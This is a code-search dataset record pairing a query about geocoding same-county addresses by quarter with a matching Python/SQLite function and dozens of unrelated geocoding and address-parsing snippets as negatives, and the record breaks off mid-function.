[ "0.66684115", "0.66580987", "0.6334983", "0.62975043", "0.61769515", "0.61367", "0.60557425", "0.6047087", "0.6028656", "0.59404755", "0.57874817", "0.57128465", "0.57006764", "0.5697978", "0.5691043", "0.5690729", "0.5679087", "0.56297153", "0.5596291", "0.55928093", "0.5568367", "0.5548994", "0.5548278", "0.55322206", "0.5515946", "0.5509877", "0.55028063", "0.5491786", "0.54814065", "0.5480621", "0.5452065", "0.54501164", "0.5443249", "0.5430048", "0.540636", "0.540484", "0.5398415", "0.5395445", "0.5355947", "0.53523433", "0.5343013", "0.5330681", "0.5324898", "0.53242874", "0.5322479", "0.5320272", "0.53152364", "0.53024685", "0.52942204", "0.52838963", "0.52838", "0.5279754", "0.52759075", "0.5267347", "0.52653176", "0.5243531", "0.5243246", "0.5232867", "0.5225581", "0.52146196", "0.52128386", "0.52028716", "0.5196866", "0.5193779", "0.5193741", "0.517402", "0.5164202", "0.51507604", "0.5146277", "0.5143922", "0.5138266", "0.5137906", "0.5137757", "0.5137757", "0.5137757", "0.5136685", "0.51355344", "0.5133684", "0.5131036", "0.5130334", "0.51271796", "0.51271427", "0.5115792", "0.51149267", "0.51027805", "0.5102055", "0.50986856", "0.5087018", "0.5085815", "0.50745124", "0.5067114", "0.5063206", "0.5056848", "0.5041147", "0.5040832", "0.5033389", "0.5033389", "0.5031916", "0.502664", "0.50209445" ]
0.5241144
57
Geocode address of the same county in quarter fashion
def partition_geocode(con: sqlite3.Connection, cur: sqlite3.Cursor, quarter: str, county_cht: str): cur.execute('''SELECT 土地區段位置或建物區門牌 FROM "{0}/TRX" WHERE 縣市 = ? GROUP BY 土地區段位置或建物區門牌;'''.format(quarter), (county_cht,)) for address, in cur.fetchall(): cur.execute('''SELECT GEO.編號 FROM "{0}/TRX" AS TRX, "{0}/GEO" AS GEO WHERE TRX.編號 = GEO.編號 AND TRX.土地區段位置或建物區門牌 = ? AND GEO.LAT_Avg ISNULL;'''.format(quarter), (address,)) identities = cur.fetchall() if not identities: continue print("[%d] "%(len(identities)) + address) try: results = selective_geocode(address) except geo.AddressError: continue if len(results["lat"]) != 5 or len(results["lon"]) != 5: continue results["lat"].append(sum(results["lat"]) / len(results["lat"])) results["lon"].append(sum(results["lon"]) / len(results["lon"])) combined = [num for zipped in zip(results["lat"], results["lon"]) for num in zipped] values = [(tuple(combined) + identity) for identity in identities] cur.executemany('''UPDATE "{0}/GEO" SET LAT_1 = ?, LON_1 = ?, LAT_2 = ?, LON_2 = ?, LAT_3 = ?, LON_3 = ?, LAT_4 = ?, LON_4 = ?, LAT_5 = ?, LON_5 = ?, LAT_Avg = ?, LON_Avg = ? WHERE 編號 = ?;'''.format(quarter), values) con.commit()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def geo_coder(house_number, boro_code, street_name, zip_code): \r\n wa1 = '1B{}{}{}{}{}C{}{}'.format(rightpad(house_number, 16), rightpad('', 38), boro_code, rightpad('', 10), rightpad(street_name, 32), rightpad('', 113), rightpad(zip_code, 5))\r\n wa1 = rightpad(wa1, 1200)\r\n wa2 = rightpad('', 4300)\r\n NYCGeo.NYCgeo(wa1, wa2)\r\n return wa1, wa2", "def geocode(self, geocoder):\n for term in self.terms:\n # No need to geocode regions\n if not term.get('region'):\n geo = geocoder.geocode(term['string'])\n if geo:\n term['geo'] = geo\n if not self.region:\n # TODO: descobrir regiao do ponto\n self.region = \"???\"\n else:\n self.region = term['region']", "def geocode(address):\n geo_data = requests.get(\"https://geocode.xyz/{}?json=1\".format(\n urllib.parse.quote_plus(address)))\n geo_json = json.loads(geo_data.content)\n\n return geo_json['standard']['city'], geo_json['latt'], geo_json['longt']", "def geocode(df, col):\r\n pass", "def get_city_by_code(post_code):\n post_code = post_code.replace(' ', '').encode('utf-8')\n error = ''\n city = ''\n opener = urllib2.build_opener()\n url = 'http://maps.googleapis.com/maps/api/geocode/json?address={0}&sensor=false'.format(post_code)\n response = opener.open(url).read()\n response_dict = json.loads(response)\n request_status = response_dict['status']\n if request_status == 'OK':\n logger.debug('Google response')\n logger.debug(response_dict)\n results = response_dict['results']\n \"\"\"\n first get all results\n with required zip code\n \"\"\"\n results_with_required_zip_code = []\n for result in results:\n address_components = result['address_components']\n for address_component in address_components:\n types = address_component['types']\n for t in types:\n if t == 'postal_code' and address_component['short_name'].replace(' ', '').lower() == post_code.lower():\n results_with_required_zip_code.append(result)\n if not results_with_required_zip_code:\n error = {\n 'status': '8',\n 'message': POST_CODE_DOES_NOT_EXISTS,\n 'title': POST_CODE_DOES_NOT_EXISTS_TITLE\n }\n # error = 'No location with post code %s' % post_code\n else:\n \"\"\"\n next we need all results in GB\n \"\"\"\n results_with_required_zip_code_in_GB = ''\n for good_result in results_with_required_zip_code:\n address_components = good_result['address_components']\n for address_component in address_components:\n types = address_component['types']\n for t in types:\n if t == 'country' and address_component['short_name'].lower() == 'GB'.lower():\n results_with_required_zip_code_in_GB = good_result\n if not results_with_required_zip_code_in_GB:\n error = {\n 'status': '7',\n 'message': POST_CODE_DOES_NOT_EXISTS_IN_GB,\n 'title': POST_CODE_DOES_NOT_EXISTS_IN_GB_TITLE\n }\n # error = 'No city with post code %s in GB' % post_code\n else:\n \"\"\"\n finally find city name\n \"\"\"\n address_components = results_with_required_zip_code_in_GB['address_components']\n # first try get postal city\n searching_city = get_city_by_key(address_components, 'postal_town')\n if not searching_city:\n # next by administrative_area_level_2\n searching_city = get_city_by_key(address_components, 'administrative_area_level_2')\n if not searching_city:\n print url\n error = {\n 'status': '7',\n 'message': POST_CODE_DOES_NOT_EXISTS_IN_GB,\n 'title': POST_CODE_DOES_NOT_EXISTS_IN_GB_TITLE\n }\n # error = 'No city with post code %s in GB' % post_code\n else:\n city = searching_city\n elif request_status == 'ZERO_RESULTS':\n error = {\n 'status': '8',\n 'message': POST_CODE_DOES_NOT_EXISTS,\n 'title': POST_CODE_DOES_NOT_EXISTS_TITLE\n }\n else:\n error = request_status\n return {\n 'error': error,\n 'data': city\n }", "def geocode(addr_str):\n\n\tbase_url = 'http://gis.oregonmetro.gov/rlisapi2/locate/'\n\turl_template = '{0}?token={1}&input={2}&form=json'\n\turl = url_template.format(base_url, token, addr_str)\n\tresponse = requests.get(url)\n\n\tif response.status_code != 200:\n\t\tprint 'unable to establish connection with rlis api'\n\t\tprint 'status code is: {0}'.format(response.status_code)\n\t\treturn response.status_code\n\t\n\tjson_rsp = response.json()\n\tif json_rsp['error']:\n\t\tprint 'the following address could not be geocoded:'\n\t\tprint '\\'{0}\\''.format(addr_str)\n\t\tprint 'the following error message was returned:'\n\t\tprint '\\'{0}\\''.format(json_rsp['error']), '\\n'\n\telse:\n\t\treturn json_rsp['data'][0]", "def geocode(postcode):\n key = current_app.config.get(\"OS_PLACES_API_KEY\")\n formatted_addresses = FormattedAddressLookup(key=key).by_postcode(postcode)\n response = [{\"formatted_address\": address} for address in formatted_addresses if address]\n return Response(json.dumps(response), mimetype=\"application/json\")", "def geocode(self, query, exactly_one=True, timeout=None):\n params = {\n 'addr': self.format_string % query,\n }\n if self.api_key:\n params['key'] = self.api_key\n url = \"?\".join((self.api, urlencode(params)))\n logger.debug(\"%s.geocode: %s\", self.__class__.__name__, url)\n return self._parse_json(\n self._call_geocoder(url, timeout=timeout), exactly_one\n )", "def roadToCoor(rn):\n # sleep(2)\n g = gmaps.geocode(rn)\n\n zipCode = None\n coor_Lat, coor_Lng, bbox_NE_Lat, bbox_NE_Lng, bbox_SW_Lat, bbox_SW_Lng = None, None, None, None, None, None\n if len(g) > 0:\n if len(g) > 0:\n for ac in g[0]['address_components']:\n try:\n if ac['types'][0] == 'postal_code':\n zipCode = ac['long_name']\n except:\n zipCode = None\n\n if 'location' in g[0]['geometry'].keys():\n try:\n coor = g[0]['geometry']['location'] # APPROXIMATE location\n coor_Lat = coor['lat']\n coor_Lng = coor['lng']\n except:\n coor_Lat, coor_Lng = None, None\n\n if 'bounds' in g[0]['geometry'].keys(): # bounding box\n try:\n bbox = g[0]['geometry']['bounds']\n bbox_NE_Lat = bbox['northeast']['lat']\n bbox_NE_Lng = bbox['northeast']['lng']\n bbox_SW_Lat = bbox['southwest']['lat']\n bbox_SW_Lng = bbox['southwest']['lng']\n except:\n bbox_NE_Lat, bbox_NE_Lng, bbox_SW_Lat, bbox_SW_Lng = None, None, None, None\n\n # g = geocoder.google(loc)\n # print(loc, g.latlng)\n coors = (coor_Lat, coor_Lng, bbox_NE_Lat, bbox_NE_Lng, bbox_SW_Lat, bbox_SW_Lng)\n return zipCode, coors", "def find_places(query):\n parts = str(query).split(' ')\n for i, p in enumerate(parts):\n p = p.replace('-', ' ').strip()\n try:\n postal_code = int(p)\n if len(postal_code) == 4:\n print(postal_code, parts[i+1])\n # Check \n #response = get_osm_location(\"{postal_code} {name}\")\n #lon = response['lon']\n #lat = response['lat']\n #poly = \n except Exception as e:\n continue", "def postcode(full_address):\n return capture_address_element(POSTCODE_PATTERN, full_address)", "def _geocode(self, phn, street, borough_code=None, zip=None):\n try:\n r = self._g[self.geofunction](house_number=phn, street=street, borough_code=borough_code, zip=zip)\n self.results.append(r)\n except GeosupportError as ge:\n if 'SIMILAR NAMES' in ge.result[\"Message\"]:\n list_of_street_names = ge.result['List of Street Names']\n r = [{\n 'street': s,\n 'borough_code': borough_code\n } for s in list_of_street_names]\n self.similiar_names.extend(r)", "def geocode(address, jurisdictions, required_precision_km=1., limit=5):\n try:\n key = 'pk.eyJ1IjoiZGV2c2VlZCIsImEiOiJnUi1mbkVvIn0.018aLhX0Mb0tdtaT2QNe2Q'\n geocoded = NewMapboxQuery(address, key=key, country='us', limit=limit)\n results = []\n if len(geocoded) > 0:\n for item in geocoded:\n multipoints = MultiPoint([GEOSGeometry(item.wkt)])\n for jurisdiction in jurisdictions.filter(geometry__intersects=multipoints):\n if not jurisdiction in results:\n results.append(jurisdiction)\n return results\n return []\n except:\n print(\"Unexpected error:\", sys.exc_info()[0])\n return []", "def geocode_one(self, postcode: str, address: Optional[str] = None) -> pd.Series:\n if postcode is None and address is None:\n raise utils.GenericException(\"You must pass either postcode or address, or both.\")\n if self.gmaps_key is None:\n self.gmaps_key = self._load_key()\n if self.gmaps_key is not None:\n self.gmaps_client = googlemaps.Client(key=self.gmaps_key)\n if self.cache is None:\n self._load_cache()\n sep = \", \" if address and postcode else \"\"\n postcode = postcode if postcode is not None else \"\"\n address = address if address is not None else \"\"\n search_term = f\"{address}{sep}{postcode}\"\n if search_term in self.cache:\n logging.debug(\"Loading GMaps Geocoder API result from cache: '%s'\", search_term)\n geocode_result = self.cache[search_term]\n else:\n logging.debug(\"Querying Google Maps Geocoder API for '%s'\", search_term)\n if self.gmaps_key is None:\n return pd.Series({\"latitude\": np.nan, \"longitude\": np.nan, \"match_status\": 0})\n geocode_result = self.gmaps_client.geocode(search_term, region=\"uk\")\n self.cache[search_term] = geocode_result\n self.cache_modified = True\n if not geocode_result or len(geocode_result) > 1:\n return pd.Series({\"latitude\": np.nan, \"longitude\": np.nan, \"match_status\": 0})\n geometry = geocode_result[0][\"geometry\"]\n ok_loc_types = [\"ROOFTOP\", \"GEOMETRIC_CENTER\"]\n if geometry[\"location_type\"] in ok_loc_types or \\\n geocode_result[0][\"types\"] == [\"postal_code\"]:\n return pd.Series({\"latitude\": geometry[\"location\"][\"lat\"],\n \"longitude\": geometry[\"location\"][\"lng\"],\n \"match_status\": 3})\n return pd.Series({\"latitude\": np.nan, \"longitude\": np.nan, \"match_status\": 0})", "def geolocate_address(self):\n self.geolocator = Nominatim(user_agent=\"fundaft\")\n\n # If latitude / longitude are missing, try to geocode them on the basis\n # of the address \n self.coords = [self.get_coords(address) if np.isnan(lat)\n else (lat, lon) for address, lat, lon in\n zip(self.df_ads['property_title'], \n self.df_ads['latitude'], \n self.df_ads['longitude'])]\n \n df = pd.DataFrame(self.coords, columns=['latitude', 'longitude'])\n \n # If new coordinates are not in Dublin, change to na again\n df = self.is_in_dublin(df)\n\n self.df_ads[[\"latitude\",\"longitude\"]] = df", "def get_city(address):\n geolocator = Nominatim(user_agent=\"specify_your_app_name_here\")\n \n while True:\n try:\n location = geolocator.geocode(address)\n break\n except Exception:\n None\n \n city = citipy.nearest_city(location.latitude, location.longitude)\n return [city.city_name.title(), city.country_code.title()]", "def rlis_geocode(addr_str, token):\n\n url = 'http://gis.oregonmetro.gov/rlisapi2/locate/'\n params = {\n 'token': token,\n 'input': addr_str,\n 'form': 'json'\n }\n rsp = requests.get(url, params=params)\n\n if rsp.status_code != 200:\n return -1, -1, -1\n else:\n json_rsp = rsp.json()\n if json_rsp['error']:\n return -1, -1, -1\n else:\n return json_rsp['data'][0]['lat'], json_rsp['data'][0]['lng'], json_rsp['data'][0]['fullAddress']", "def selective_geocode(rough_address: str) -> dict:\n lat_results = []; lon_results = []\n found = re.findall(r\"\\d+~\\d+\", rough_address)\n if not found:\n raise geo.AddressError(geo.__name__, rough_address)\n bound = [int(i) for i in found[0].split('~')]\n if bound[0] > bound[1]:\n raise geo.AddressError(geo.__name__, rough_address)\n interval = int((bound[1] - bound[0] + 1) / settings.GEO_SAMPLES)\n samples = [i for i in range(bound[0], bound[1] + 1, interval)]\n for sample in samples:\n query_address = rough_address.replace(found[0], str(sample))\n gps_coordinates = geo.geocode(query_address, culture='zh-TW')[\"GPS\"]\n if gps_coordinates[\"lat\"] and gps_coordinates[\"lon\"]:\n lat_results.append(gps_coordinates[\"lat\"])\n lon_results.append(gps_coordinates[\"lon\"])\n return {\"lat\": lat_results, \"lon\": lon_results}", "def _format_address(address):\n if 'country' in address and address['country']:\n country = address['country']\n if country == 'CA':\n address['country'] = 'CANADA'\n elif country == 'US':\n address['country'] = 'UNITED STATES OF AMERICA'\n else:\n try:\n country: str = pycountry.countries.search_fuzzy(country)[0].name\n address['country'] = country.upper()\n except (AttributeError, TypeError):\n address['country'] = country\n\n return address", "def geocode(address):\n\n mapsurl = ('http://maps.googleapis.com/maps/api/geocode/xml?address=' +\n address.replace(' ', '+') + '&sensor=false')\n\n coords = urllib.urlopen(mapsurl).read()\n root = etree.fromstring(coords)\n coordstr = (0, 0)\n loc = root.find(\".//location\")\n if not loc is None:\n coordstr = (loc[1].text, loc[0].text)\n return coordstr", "def geocode(self, resource):\n # Turn the different address components into a formatted string\n search_address = \", \".join(a for a in [resource.street,\n resource.city, resource.state,\n resource.zipcode, resource.country]\n if a is not None and not\n a.isspace())\n\n # Make sure we generated something meaningful\n if search_address and search_address is not None:\n # Now query the geocoder with this formatted string\n geolocator = GoogleV3(api_key=self.api_key)\n address, (latitude, longitude) = geolocator.geocode(search_address)\n\n # Update the resource based on the returned geopy.location.Location\n if address and not address.isspace():\n resource.fulladdress = address\n\n if latitude and longitude:\n resource.latitude = latitude\n resource.longitude = longitude\n\n # FUTURE: Perform additional normalization operations based\n # on the information in Location.raw\n pass", "def makeAddressToGeocodeRequest(address):\n global headersGlobal, URL_addressToGeocode # get global variables\n\n key = variables.bingMapsAPIKey # api key\n\n # construct the url\n url = URL_addressToGeocode + str(address[0]) + \"/\" + str(address[1]) + \"/\" + str(address[2]) + \"/\" + str(\n address[3]) + \"/\" + str(address[4]) + \"?key=\" + key\n\n request = requests.get(url, headers=headersGlobal) # make the request\n return request # return the request", "def geocoding(address):\n AUTH = json.loads(open(\"auth.json\", \"r\").read())\n\n r = requests.get(f\"https://maps.googleapis.com/maps/api/geocode/json\", params={\n \"address\": address,\n \"key\": AUTH[\"GMAP_API\"]\n })\n\n if r.status_code == 200:\n r = r.json()\n results = r[\"results\"]\n if len(results) < 1:\n log.error(\"No result geocoding for %s\", address)\n return (-1, -1)\n\n result = results[0]\n proper_address = result[\"formatted_address\"]\n loc = result[\"geometry\"][\"location\"]\n lat = loc[\"lat\"]\n lng = loc[\"lng\"]\n\n return (proper_address, lat, lng)\n\n else:\n log.error(\"Error in Geocoding %s\", address)\n return (-1, -1)", "def county_name(zipcode): \n search = SearchEngine(simple_zipcode=True) # set simple_zipcode=False to use rich info database\n zipcode_query = search.by_zipcode(str(zipcode))\n zipcode_query_dict = zipcode_query.to_dict()\n county = zipcode_query_dict['county']\n if county is None:\n print('Invalid County')\n else :\n if 'County' in county:\n county = county[:-7]\n if county in county_list:\n print('County is County List')\n print(county)\n return county", "def geocoding(address, API_KEY=API_KEY, GEOCODE_API_URL=GEOCODE_API_URL):\n # define the parameters of the search\n params = {\n 'address': '{}'.format(address),\n 'key': API_KEY\n }\n\n # Do the request and get the response data\n response = requests.get(GEOCODE_API_URL, params=params)\n response = response.json()\n\n geodata = parse_response(response)\n return geodata", "def test_city_country_population(self):\n\t\tformatted_address = city_country(\n\t\t\t'santiago', 'chile', '5000000')\n\t\tself.assertEqual(formatted_address, \n\t\t\t'Santiago, Chile - Population 5000000')", "def get_location_gecode_address_str(address):\n location = {\n 'Latitude': {\n 'Value': None\n },\n 'Longitude': {\n 'Value': None\n }\n }\n geo_res = []\n if bool(address): # Check if address is non-falsey \n geo_res = gmaps.geocode(address)\n if len(geo_res) != 0:\n latitude = geo_res[0]['geometry']['location']['lat']\n longitude = geo_res[0]['geometry']['location']['lng']\n location['Latitude']['Value'] = latitude\n location['Longitude']['Value'] = longitude\n return location", "def geocode_postcode(self, postcode: [str],\n address: Optional[str] = None) -> Union[Tuple[float, float], List[Tuple[float, float]]]:\n address = [None for a in address] if address is None else list(address)\n logging.debug(\"Geocoding %s postcodes (%s addresses)\", len(postcode), len(address))\n results = []\n for pc, addr in zip(postcode, address):\n results.append(self.geocode_one(postcode=pc, address=addr))\n return results", "def geocode(self, term):\n # TODO: permitir cofigurar isso...\n # limit string size\n s = term[:60]\n # check cache\n term_geo = self.cache.get(s)\n if not term_geo:\n term_geo = {}\n # query all servers\n for server_name, func in self.server_options.items():\n points = func(s)\n term_geo[server_name] = []\n for point in points:\n region = self.inside_limits(point)\n if region:\n if region is True:\n region = \"???\"\n print(region)\n term_geo[server_name].append({\n \"address\": point.address,\n \"latitude\": point.latitude,\n \"longitude\": point.longitude,\n \"region\": region\n })\n self.cache[s] = term_geo\n # print(\"------------------------------------\")\n # print(term_geo)\n return term_geo", "def address_to_census(address, aggregation=\"blocks\", max_requests = 100):\n if pd.isna(address):\n return address\n\n OPTIONS = {\"census block groups\", \"census block group\", \"block groups\", \"block group\", \"census blocks\",\n \"census block\", \"blocks\", \"block\", \"census tracts\", \"census tract\", \"tracts\", \"tract\"}\n\n assert aggregation in OPTIONS, \"The selected aggregation is not a valid option. Please select from the 3 possible choices: block groups, blocks, tracts\"\n\n result = cg.onelineaddress(address, returntype=\"geographies\")\n\n if result:\n geographies = result[0][\"geographies\"]\n census_blocks = geographies[\"2020 Census Blocks\"][0]\n else:\n geolocator = ArcGIS()\n g = geolocator.geocode(address)\n x = g.longitude\n y = g.latitude\n result = None\n # This while loop is meant to deal with errors thrown on portions of the responses from https://geocoding.geo.census.gov/geocoder/\n # https://github.com/fitnr/censusgeocode/issues/18\n req_counter = 0\n while result is None and req_counter < max_requests:\n try:\n result = cg.coordinates(x=x, y=y, returntype=\"geographies\")\n except:\n pass\n req_counter += 1\n census_blocks = result[\"2020 Census Blocks\"][0]\n\n\n STATE = census_blocks[\"STATE\"]\n COUNTY = census_blocks[\"COUNTY\"]\n TRACT = census_blocks[\"TRACT\"]\n BLOCK_GROUP = census_blocks[\"BLKGRP\"]\n BLOCK = census_blocks[\"BLOCK\"]\n\n if str.lower(aggregation) in {\"census block groups\", \"census block group\", \"block groups\", \"block group\"}:\n return STATE + COUNTY + TRACT + BLOCK_GROUP\n elif str.lower(aggregation) in {\"census blocks\", \"census block\", \"blocks\", \"block\"}:\n return STATE + COUNTY + TRACT + BLOCK\n elif str.lower(aggregation) in {\"census tracts\", \"census tract\", \"tracts\", \"tract\"}:\n return STATE + COUNTY + TRACT", "def concat_address_full(**kwargs):\r\n result = \"{concat_address} {city_name}, {state_code}\".format(**kwargs)\r\n if kwargs[\"five_digit_zip_code\"]:\r\n result += \" {five_digit_zip_code}\".format(**kwargs)\r\n if kwargs[\"four_digit_zip_code\"]:\r\n result += \"-{four_digit_zip_code}\".format(**kwargs)\r\n return result", "def resolve_query_place(query):\n\n\tallTokens = [token for token in query.replace(',', ' ').split(' ') if token]\n\tif not len(allTokens):\n\t\treturn ('', None)\n\tcomponents = [component.split(' ') for component in query.split(',') if component]\n\tcities = None\n\tregions = None\n\tcountries = None\n\tplaces = None\n\tconsumed = 0\n\t\n\tdef get_component():\n\t\t\"\"\" Returns a sub sequence of a component. This makes use of the commas as hard delimiters to separate city, state, etc. \"\"\"\n\t\tcomponentConsumed = consumed\n\t\tfor i in range(len(components)):\n\t\t\tif componentConsumed < len(components[-i]):\n\t\t\t\treturn components[-i][:-componentConsumed if componentConsumed else None]\n\t\t\telse:\n\t\t\t\tcomponentConsumed -= len(components[-i])\n\t\treturn []\n\n\tif len(allTokens[-1]) == 2 and allTokens[-1].isalpha():\n\t\tif len(allTokens) >= 2 and len(allTokens[-2]) == 2 and allTokens[-2].isalpha():\n\t\t\t# A county and region code were given. e.g. CA US -> US.CA\n\t\t\tregions = Region.objects.filter(code='%s.%s' % (allTokens[-1].upper(), allTokens[-2].upper()))\n\t\t\tconsumed = 2\n\t\telse:\n\t\t\t# A single region or country code was given\n\t\t\tregions = Region.objects.filter(code__endswith=allTokens[-1].upper())\n\t\t\tif not len(regions):\n\t\t\t\tcountries = Country.objects.filter(code=allTokens[-1].upper()).order_by('-population')\n\t\t\tconsumed = 1\n\t\tif len(regions):\n\t\t\t# Found a region, also try to find the city that goes with the region\n\t\t\tplaces = regions\n\t\t\tcityConsumed = __parse_city(get_component())\n\t\t\tif cityConsumed:\n\t\t\t\tcities = City.objects.filter(name__iexact=' '.join(allTokens[-(consumed + cityConsumed):-consumed if consumed else None]), region__in=regions).order_by('-population')\n\t\t\t\tif len(cities):\n\t\t\t\t\tplaces = cities\n\t\t\t\t\tconsumed += cityConsumed\n\t\telif len(countries):\n\t\t\t# Found a country, also try to find the city that goes with the country\n\t\t\tplaces = countries\n\t\t\tcityConsumed = __parse_city(get_component())\n\t\t\tif cityConsumed:\n\t\t\t\tcities = City.objects.filter(name__iexact=' '.join(allTokens[-(consumed + cityConsumed):-consumed if consumed else None]), country=countries[0]).order_by('-population')\n\t\t\t\tif len(cities):\n\t\t\t\t\tplaces = cities\n\t\t\t\t\tconsumed += cityConsumed\n\telse:\n\t\t# No codes were given, the query is more free form\n\t\t# Match the country first\n\t\tcountryConsumed = __parse_country(get_component())\n\t\tif countryConsumed:\n\t\t\tcountries = Country.objects.filter(name__iexact=' '.join(allTokens[-(consumed + countryConsumed):-consumed if consumed else None])).order_by('-population')\n\t\t\tif len(countries):\n\t\t\t\tplaces = countries\n\t\t\t\tconsumed += countryConsumed\n\t\t# Try region then city matching\n\t\tregionConsumed = __parse_region(get_component())\n\t\tif regionConsumed:\n\t\t\tif countries and len(countries):\n\t\t\t\tregions = Region.objects.filter(name__iexact=' '.join(allTokens[-(consumed + regionConsumed):-consumed if consumed else None]), country=countries[0])\n\t\t\telse:\n\t\t\t\tregions = Region.objects.filter(name__iexact=' '.join(allTokens[-(consumed + countryConsumed):-consumed if consumed else None]))\n\t\t\tif len(regions):\n\t\t\t\tplaces = regions\n\t\t\t\tconsumed += regionConsumed\n\t\tcityConsumed = __parse_city(get_component())\n\t\tif cityConsumed:\n\t\t\tif regions and len(regions):\n\t\t\t\tcities = City.objects.filter(name__iexact=' '.join(allTokens[-(consumed + cityConsumed):-consumed if consumed else None]), region__in=regions).order_by('-population')\n\t\t\telif len(countries):\n\t\t\t\tcities = City.objects.filter(name__iexact=' '.join(allTokens[-(consumed + cityConsumed):-consumed if consumed else None]), country=countries[0]).order_by('-population')\n\t\t\telse:\n\t\t\t\tcities = City.objects.filter(name__iexact=' '.join(allTokens[-(consumed + cityConsumed):-consumed if consumed else None])).order_by('-population')\n\t\t\tif len(cities):\n\t\t\t\tplaces = cities\n\t\t\t\tconsumed += cityConsumed\n\t\t# If region was found without a city go back to just try to resolve it to a city instead\n\t\tif (regions and len(regions)) and (not cities or not len(cities)):\n\t\t\tconsumed -= regionConsumed\n\t\t\tcityConsumed = __parse_city(get_component())\n\t\t\tif cityConsumed:\n\t\t\t\tif len(countries):\n\t\t\t\t\tcities = City.objects.filter(name__iexact=' '.join(allTokens[-(consumed + cityConsumed):-consumed if consumed else None]), country=countries[0]).order_by('-population')\n\t\t\t\telse:\n\t\t\t\t\tcities = City.objects.filter(name__iexact=' '.join(allTokens[-(consumed + cityConsumed):-consumed if consumed else None])).order_by('-population')\n\t\t\t\tif len(cities):\n\t\t\t\t\tplaces = cities\n\t\t\t\t\tconsumed += cityConsumed\n\t\t\tif not cities or not len(cities):\n\t\t\t\t# No city found, region is the best match\n\t\t\t\tconsumed -= regionConsumed\n\n\treturn (' '.join(allTokens[:-consumed if consumed else None]), places)", "def address():\n # We start with generating the street name. For this we choose\n # between the most common prefixes and our own prefixes\n prefix = dice.randint(1, 100)\n if prefix <= 10: # 10%\n prefix = \"Haupt\"\n elif prefix <= 18: # 8%\n prefix = \"Schul\"\n elif prefix <= 25: # 7%\n prefix = \"Garten\"\n elif prefix <= 32: # 7%\n prefix = \"Dorf\"\n elif prefix <= 39: # 7%\n prefix = \"Bahnhof\"\n elif prefix <= 46: # 7%\n prefix = \"Wiesen\"\n elif prefix <= 52: # 6%\n prefix = \"Berg\"\n elif prefix <= 56: # 4%\n prefix = \"Kirch\"\n elif prefix <= 60: # 4%\n prefix = \"Wald\"\n elif prefix <= 64: # 4%\n prefix = \"Ring\"\n else:\n prefix = dice.choice(names.prefix)\n\n # Now we can add the suffix\n suffix = dice.randint(1, 100)\n if suffix <= 78:\n suffix = \"straße\"\n elif suffix <= 96:\n suffix = \"weg\"\n elif suffix <= 98:\n suffix = \"allee\"\n elif suffix == 99:\n suffix = \"ring\"\n elif suffix == 100:\n suffix = \"platz\"\n\n # When we have a city name as prefix, we need to capitalize the\n # suffix since it will be two words\n if prefix[-1] == \" \":\n suffix = suffix.capitalize()\n\n # Now we can add them together\n street = prefix + suffix\n\n # We need a house number as well. In Germany most numbers have\n # between one and four digits, so we will use this as base. Lower\n # numbers are more common, so we'll give it a 10% probability of\n # using 3 digits and 1% of using 4 digits\n digits = dice.randint(1, 100)\n if digits == 100:\n house_number = str(dice.randint(1000, 9999))\n elif digits >= 90:\n house_number = str(dice.randint(100, 999))\n else:\n house_number = str(dice.randint(1, 99))\n address_full = street + \" \" + house_number\n return address_full", "def search_address(query: str) -> Tuple[int, str]:\n\n url = 'https://api.n1.ru/api/v1/geo/geocoder/with_cities/'\n params = _search_params.copy()\n params['q'] = query\n\n try:\n r = requests.get(url, params=params, headers=_headers)\n response = r.json()\n\n if not 'result' in response or not response['result']:\n raise NotFoundException('Result not found or empty.')\n \n address = None\n house_number = query.split(',')[-1].strip()\n for x in response['result']:\n if x['name_ru'].lower() == house_number:\n address = x\n break\n \n if address is None:\n raise NotFoundException(f'Not found house number {house_number} in result: {response[\"result\"]}')\n \n return address['street']['id'], address['name_ru']\n except requests.RequestException as e:\n raise ParserException(f'Fail make request. query: {query}') from e\n except NotFoundException as e:\n raise ParserException('Invalid result.') from e\n except (KeyError, IndexError) as e:\n raise ParserException(f'Fail get street id or house number. value: {response[\"result\"]}') from e", "def county_to_zip(county: str, state: str, df: pd.DataFrame) -> list:\n\n if (type(county) == float or type(state) == float):\n return []\n\n county = county.strip()\n \n result = list(df.loc[(df['state'] == state) & (county == df['county'].str.replace(' County', '').str.replace(' City', '')), 'zip'])\n if (result == []):\n print(county + ', ' + state)\n\n return result", "def maxmind_geocode():\n reader = maxminddb.open_database('GeoLite2-City.mmdb')\n asn = maxminddb.open_database('GeoLite2-ASN.mmdb')\n\n unique_ips = session.query(UniqueVictims).all()\n\n for ip in unique_ips:\n try:\n current_ip = reader.get(ip.ip)\n asn_ip = asn.get(ip.ip)\n ip.lat = current_ip['location']['latitude']\n ip.long = current_ip['location']['longitude']\n if 'city' in current_ip:\n ip.city = current_ip['city']['names']['en']\n if 'country' in current_ip:\n ip.country = current_ip['country']['names']['en']\n if asn_ip:\n ip.isp = asn_ip['autonomous_system_organization']\n except TypeError:\n continue\n session.commit()", "def extract_zipcode(full_address):\n full_address = full_address.strip()\n last_space_index = full_address.rindex(\" \")\n zipcode = full_address[last_space_index + 1 : ]\n return zipcode", "def city_country(city, country):\n return(city + ', ' + country)", "def get_city_country(city, country, population=''):\n if population:\n location = city + ' ' + country + ' ' + str(population)\n return location.title()\n\n else:\n location = city + ' ' + country\n return location.title()", "def test_city_country(self):\n\t\tformatted_address = city_country('santiago', 'chile')\n\t\tself.assertEqual(formatted_address, 'Santiago, Chile')", "def return_city(n):\n if n == 1:\n return \"San Francisco\"\n elif n == 2:\n return \"Los Angeles\"\n elif n == 3:\n return \"Las Vegas\"\n elif n == 4:\n return \"Portland\"\n elif n == 5:\n return \"San Diego\"\n else:\n return \"Seattle\"", "def country(alpha_2_code: str) -> None:", "def coordinates(latitude, longitude):\r\n location = geolocator.reverse(latitude + \", \" + longitude)\r\n data = location.raw\r\n data = data['address']\r\n state_code = data['state']\r\n return state_code", "def maploc(loc):\n\n\n loc = REGEX['parens'].sub('', loc)\n loc = REGEX['and'].sub('', loc)\n loc = REGEX['num'].sub('', loc)\n\n \"\"\"\n 'parens' 'and' 'single' 'num' 'seeley' 'iab' 'brh'\n \"\"\"\n \"\"\"\n /* For non-street address, strip room numbers */\n if (!location.match(' Ave')) {\n location = location.replace(/LL[0-9]/g, '').replace(/[0-9]/g, '');\n }\n /* Some text substitutions */\n location = location.replace('Seeley W.', '').replace('International Affairs Building', '420 W 118th St').replace('Broadway Residence Hall', '2900 Broadway');\n\n 